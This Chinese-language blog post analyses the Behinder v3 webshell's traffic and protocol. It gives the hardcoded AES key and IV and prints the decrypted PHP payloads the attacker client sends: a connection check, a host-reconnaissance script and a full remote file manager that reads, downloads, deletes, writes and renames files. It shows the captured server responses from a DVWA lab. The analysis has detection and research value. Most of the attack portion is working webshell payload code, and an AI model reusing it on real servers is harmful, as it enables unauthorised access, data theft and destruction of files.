Posted Updated Penetration13 minutes read (About 1956 words)

冰蝎(BehinderV3.X) 原理分析

V2.1

V3.0

Behinder3 原理

承接冰蝎 2,冰蝎 2 的每次连接会使用一个随机令牌 pass(即通过 Shell 交互过程中的 HTTP 请求特征可作为特征拦截);流程为:密钥协商->加密传输,而密钥协商这块会被作为特征而被拦截;通过 Webshell 上传时的流量特征来检测;通过利用 rasp 机制来检测,具体原理文章详见 冰蝎-特征检测及报文解密
冰蝎原理图

而冰蝎 3 取消了随机令牌,固定了令牌在 shell.php\asp\jsp 等里边,其代码是:

1
2
3
4
5
 //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$key="e45e329feb5d925b";

//机理
md5("admin")\[0:16\];

冰蝎 3 使用了 AES 对称加密与 Base64 的结合,流量中的数据需要使用密码为 e45e329feb5d925b(rebeyond 的 md5 前 16 位),偏移量为 0123456789abcdef
,AES 加密模式一定为 CBC

通过 wireshark 抓包,冰蝎会发送两次 POST 包,接收到两次包,即两次客户端-服务端交互

第一次交互

客户端发送

冰蝎首先发送一个通过AES 解密,再通过 Base64 解密为如下内容的包(解密流程看 冰蝎 Behinder 3.X ),来建立连接同时发送content内容作为连接成功的配对,如果对方服务器返回了content的内容,证明连接成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
//这段数据包在实际流量中应该是Base64再AES后的密文
@error_reporting(0);
function main($content)
{
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }//下面这段content在BehinderV3.0 Beta1中是很短一段字符串,而Beta6做了混淆
}$content="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"; 
main($content);

服务端相应 1

1
2
//即响应客户端发送的content,如果返回了这个则说明连接成功了
mxZeJLC1SP9TlkzwIfMXVwcRoEKvgQ5cTj93yIVOeGe34Fi5XU1fxjXmsAguIHjtSAEhl96E2ZkanSlhF8ztIvNd8bcyNAqRiX0MxAgi6pBbDMjwIk0SqMPCgnLy2FoOrl0O1Nm4hxWUL8MkLYFd4kdklRiXuM5AQO972gBkhSqKNwijpqFw2leWXRJVilTWt7h0N5ZqQkrMY6WKCOPcl2O2WxE7bUbqAkRczTKlI856slKPf8XOvZz4kC3W4sGU0ltfBcSththz0xayUB3fZe8Qte5MgVCPXgUG2OlwCvoQYcX88X3bNxw2N1se0PT7gTjVdJIlBilQfcKjPh37muRfoYypA2FEoLeLBTjEZxcj053ZIED6QElZOMBsLApIzyNTgzH3QUzZAT8XlcsqMT7gljm7HLgmFfbCTJSN1S9TQ24BeeEcNe3dvLFeh0uAuXNQqTyMAU7bv3Z3dAQ8YcQaayPr5jQuObDdkLusSGP1Macg2aZTiOiOCdK7kmEllrcp7JAMXfn90FIcpwzYxOPHFJXWU9ApVqEXSYb6VjakObvt2UKMnz8bra5acgROCsGL6qfgOuBB90dC313uXjof3wAiQOtbMllf0hgwVTTFEXI7FxB6tb92lYRvHX1qaZJqExLF8fyqfgT48hj4z6XrgowwgZVVXTMsEYZWyCu5NnqaRQltsaRJjaXaycDd3zHbTZecQNuB6EPYSlFj0mpZKmdtwWE611vZQoIZgThi1CmftnQQmDtmOPjlJ2zSf2kFcrGDr5iVKzh2b0RCI7QKCruJGYEo2lVUk6geo4HZes2IO9cKPOxL2D6Ckgv4WUvz6Nx3xZ8w4lwubR51ZQGYCYvnkgvAy1ckkWovi4XZ9UBbv9WOnflj4HDJwA4XQ9WC9dqr1A1RYEDpuCJlM0RXQCauP3RNi2mGZzMa4CTZG9ZEysQpn188CoUvPvKeYwFGt61XU3Q1IXVA9GUzh0oIqZwBxUtYIqtptiWVmu1gjGdzHlOLJrRuVviMFkD2g4jO4wkHanAZuoi6g8Imsr5cqkFhwlUyo9mXSTGkh1TOQFZM2WKXuKZuNym03dHk65M3QR4OSLKw8D0UzKb2XrCsdEFsxx5tOLhTZXDjN6GzjDJMLHiKO5H6Yw3IEFczoKg7kDrANXa2mdLGzf0y3lLnTPYqYxMkrO8iAs0dk1365llimA7Ye2egSA8CYnjtt0nriA17WYTGZ9L5u6dXaKUh4cPonDmYV5EuHkPMrXirwVZ0Sc5IbUygfsNyX283FsBq274UuZq3uym66aaXosQ9Li4o0MP1KmZUsx8A3sv1uimzyhavEIiuwvzRJDL6WK14mOOV7EfDQPDF4YOJmaJQOQhdLxf4KfzlLhAyykpcmPK0zoQM8bLv1AwivQLJJ1bKxokUamrVDKwG9UaakVwHd6Szn6bEvpacMznYCx2Eg914fZWE30wTCUHv0IOaaMnbvMmHE8Lum813jX8ZAg9lU9NKAMrWiW6o0RbADLQgqp79nv8LVtN2z2AxQQKQlSWQCuEcRlKzZyz6fupHW8HKQUdf4ihfJ213c5yTaO7dYDveDUuJmaDxNohXjexMaQ6oabffMamJNjUlYgS6Iz9t9YCZ4VAbFVuO8UzO0sAoQe7eIutoTaPo0NuIq3R81mRzJElNqPsEkM0bUWRBLeKlBS1lDmuLUX7eP9uzNx7KVbxu6FRNjdlXyqVO9aJ8b756eJazwh1BXXjg4CatPkocqGwM4d3QT70rZFZNRcYjzUetDnqWWg6w2T3CWel6UO6cvVaJtj8Hf7dOxETxcPFXmHdzmnv0PF4YE9rVbD4eiMe1Xp68GtLTIFY7tMpFqphUbPrSxDICRTRc2LK1sWzREqUWk7keLV780yuKPFD2FMVlyfvtIYMtGEuFAGsCyF0ZE0Eh9k0Bxx1W6nwwHGYaSTN5yWYtnyF8IuQqpZXgwlhMvZmuOm1mw6CPKZuBY5RZrfFpKtCJDylQbgRzOQ2Pn7FST7COr2s9hQpqTtygtC8s8yrfQgbEaLeujI39CH5tDKWEGhQbpd0o2ph28f2HtTUCY

第二次交互

客户端发送

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
error_reporting(0);
function main($whatever) {
    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
        for($i=65;$i<=90;$i++)
        {
            $drive=chr($i).':/';
            file_exists($drive) ? $driveList=$driveList.$drive.";":'';
        }
    }
    else
    {
        $driveList="/";
    }
    $currentPath=getcwd();
    //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    echo encrypt(json_encode($result), $key);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }
}$whatever="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";
main($whatever);
  • 这个过程就是得到 phpinfocurrentPathdriveListosInfo(windows/winnt,否则 driveList 为空)

服务端响应

1
2
3
4
5
6
7
............"8L2JvZHk+PC9odG1sPg==",//此处省略一堆数据,重点在最后
"driveList":"QzovOw==","currentPath":"QzpccGhwc3R1ZHlfcHJvXFdXV1xEVldBXGhhY2thYmxlXHVwbG9hZHM=","osInfo":"V0lOTlQ="}

而这些解码后就是:
C:/;
C:\phpstudy_pro\WWW\DVWA\hackable\uploads
WINNT

如果要看文件的话,则是以下流程

客户端发送

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function getgbkStr($str){
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    if($s1 == $str){
        return $s1;
    }else{
        return iconv('utf-8','gbk//IGNORE',$str);
    }
}
function delDir($dir)
{
    $files = array_diff(scandir($dir), array(
        '.',
        '..'
    ));
    foreach ($files as $file) {
        (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
    }
    return rmdir($dir);
}

function main($mode, $path = ".", $content = "", $charset = "",$newpath="")
{
    //$path=getgbkStr($path);
    $path=getSafeStr($path);
    $result = array();
    if ($path == ".")
        $path = getcwd();
    switch ($mode) {
        case "list":
            $allFiles = scandir($path);
            $objArr = array();
            foreach ($allFiles as $fileName) {
                $fullPath = $path . $fileName;
                if (!function_exists("mb_convert_encoding"))
                {
                  $fileName=getSafeStr($fileName);
                }
                else
                {
                    $fileName=mb_convert_encoding($fileName, 'UTF-8', mb_detect_encoding($fileName, "UTF-8,GBK"));
                }
                $obj = array(
                    "name" => base64_encode($fileName),
                    "size" => base64_encode(filesize($fullPath)),
                    "lastModified" => base64_encode(date("Y-m-d H:i:s", filemtime($fullPath)))
                );
                $obj["perm"] = is_readable($fullPath) . "," . is_writable($fullPath) . "," . is_executable($fullPath);
                if (is_file($fullPath)) {
                    $obj["type"] = base64_encode("file");
                } else {
                    $obj["type"] = base64_encode("directory");
                }
                array_push($objArr, $obj);
            }
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode(json_encode($objArr));
            echo encrypt(json_encode($result), $_SESSION['k']);
            break;
        case "show":
            $contents = file_get_contents($path);               
            $result["status"] = base64_encode("success");
            if (function_exists("mb_convert_encoding"))
            {
                if ($charset=="")
                {
                    $charset = mb_detect_encoding($contents, array(
                        'GB2312',
                        'GBK',
                        'UTF-16',
                        'UCS-2',
                        'UTF-8',
                        'BIG5',
                        'ASCII'
                    ));
                }
                $result["msg"] = base64_encode(mb_convert_encoding($contents, "UTF-8", $charset));
            }
            else
            {
                if ($charset=="")
                {
                    $result["msg"] = base64_encode(getSafeStr($contents));
                }
                else
                {
                    $result["msg"] = base64_encode(iconv($charset, 'utf-8//IGNORE', $contents));
                }
                
            }
            $result = encrypt(json_encode($result),$_SESSION['k']);
            echo $result;
            break;
        case "download":
            if (! file_exists($path)) {
                header('HTTP/1.1 404 NOT FOUND');
            } else {
                $file = fopen($path, "rb");
                echo fread($file, filesize($path));
                fclose($file);
            }
            break;
        case "delete":
            if (is_file($path)) {
                if (unlink($path)) {
                    $result["status"] = base64_encode("success");
                    $result["msg"] = base64_encode($path . "删除成功");
                } else {
                    $result["status"] = base64_encode("fail");
                    $result["msg"] = base64_encode($path . "删除失败");
                }
            }
            if (is_dir($path)) {
                delDir($path);
                $result["status"] = base64_encode("success");
                $result["msg"] = base64_encode($path."删除成功");
            }
            echo encrypt(json_encode($result),$_SESSION['k']);
            break;
        case "create":
            $file = fopen($path, "w");
            $content = base64_decode($content);
            fwrite($file, $content);
            fflush($file);
            fclose($file);
            if (file_exists($path) && filesize($path) == strlen($content)) {
                $result["status"] = base64_encode("success");
                $result["msg"] = base64_encode($path . "上传完成,远程文件大尿:" . $path . filesize($path));
            } else {
                $result["status"] = base64_encode("fail");
                $result["msg"] = base64_encode($path . "上传失败");
            }
            echo encrypt(json_encode($result), $_SESSION['k']);
            break;
        case "createDirectory":
            if (file_exists($path)) {
                    $result["status"] = base64_encode("fail");
                    $result["msg"] = base64_encode("创建失败,目录已存在〿");
                }
                else
                {
                mkdir($path);
                $result["status"] = base64_encode("success");
                $result["msg"] = base64_encode("目录创建成功〿");
                }
            echo encrypt(json_encode($result), $_SESSION['k']);
            break;
        case "append":
            $file = fopen($path, "a+");
            $content = base64_decode($content);
            fwrite($file, $content);
            fclose($file);
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode($path . "追加完成,远程文件大尿:" . $path . filesize($path));
            echo encrypt(json_encode($result),$_SESSION['k']);
            break;
        case "rename":
            if (rename($path,$newpath)) {
                $result["status"] = base64_encode("success");
                $result["msg"] = base64_encode("重命名完房:" . $newpath);
            } else {
                $result["status"] = base64_encode("fail");
                $result["msg"] = base64_encode($path . "重命名失贿");
            }
            echo encrypt(json_encode($result), $_SESSION['k']);
            break;
        default:
            break;
    }
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }
}$mode="list";$path="C:/phpstudy_pro/WWW/DVWA/hackable/";
main($mode,$path);

服务端响应

1
2
3
4
5
6
7
8
[
{"name":"Lg==","size":"MA==","lastModified":"MjAyMS0wMi0xNiAxOToxNjo0NA==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"Li4=","size":"NDA5Ng==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"MS5waHA=","size":"Mjc=","lastModified":"MjAyMS0wMi0xNiAxOToxNjo0NA==","perm":"1,1,","type":"ZmlsZQ=="},
{"name":"ZmxhZ3M=","size":"MA==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"dXBsb2Fkcw==","size":"MA==","lastModified":"MjAyMS0wMi0yMiAyMjoyMjozOQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"dXNlcnM=","size":"MA==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"}
]
  • Base64 解码即是读取的各种文件的属性,例如 Lg==就是 .,而 Li4==就是 ..

冰蝎(BehinderV3.X) 原理分析

https://resek4.github.io/2020/08/11/冰蝎/

Author

Resek4

Posted on

2020-08-11

Updated on

2023-02-26

Licensed under

Comments

Follow

Archives

Catalogue

Categories

Recents

×